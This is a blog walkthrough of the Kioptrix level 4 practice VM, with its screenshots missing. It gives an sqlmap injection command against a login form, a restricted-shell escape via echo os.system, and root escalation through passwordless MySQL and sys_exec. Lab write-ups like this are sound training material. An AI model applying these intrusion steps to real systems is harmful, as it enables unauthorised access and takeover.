[Hacking series] – Kioptrix level 4

Written by  on June 11, 2015 

Code name: Kioptrix4

Webpage: http://kioptrix.com/

VM Download: http://www.kioptrix.com/dlvm/Kioptrix4_vmware.rar

Challange: Get root on the system

We are almost done with kioptrix challanges, let’s get it started with this one. As usual, first of all and after locating the box on the network, we scan the vm using nmap

1

2 interesting ports found here, 22(ssh) and 80(web server), 139/445 might be quite interesting too but let’s focus on both first.

After looking on the web server we found:

2

Looks like a web app that connects to an sql database, it might allow a user to log into the system. We can try to exploit this form by performing an sql injection on some of the form’s fields. Sqlmap will do the job.

#sqlmap -u 192.168….” –data=”user=p&password=a” –level=5 –risk=5 –dbs

3

Sqlmap found a valid sql injection, great! Now we can browse the servers databases

4

After digging a litle bit, we found

5

2 valid logins found, we can try to use these credentials against the ssh server.

5.1

We logged in, but we have a very very limited shell, we can try to “escape” that by performing a litle trick. According to the permited commands we can run the echo command, so..

$ echo os.system(‘/bin/bash’)

6

Great, we jumped in, now let’s find our way to root. We can move to a more interactive shell by using python.

7

Now, and after exploring the system in depth, we found that there is a mysql server inside the box and it allows root login without password, according to this, we can try another trick on that, first we’ll make sure that lib_mysqludf_sys.so is in the system, this library will let us do very interesting things

library

it is! Now using the following trick, we’ll be able to run commands as root by using the root login on mysql server with sys_exec

8

By doing that, we added the user john to the admins group, now we can just use sudo to get root on the sys

9

got root.

10

Game over kioptrix4 P-)

 

Category : hacking series

Leave a Reply

Your email address will not be published. Required fields are marked *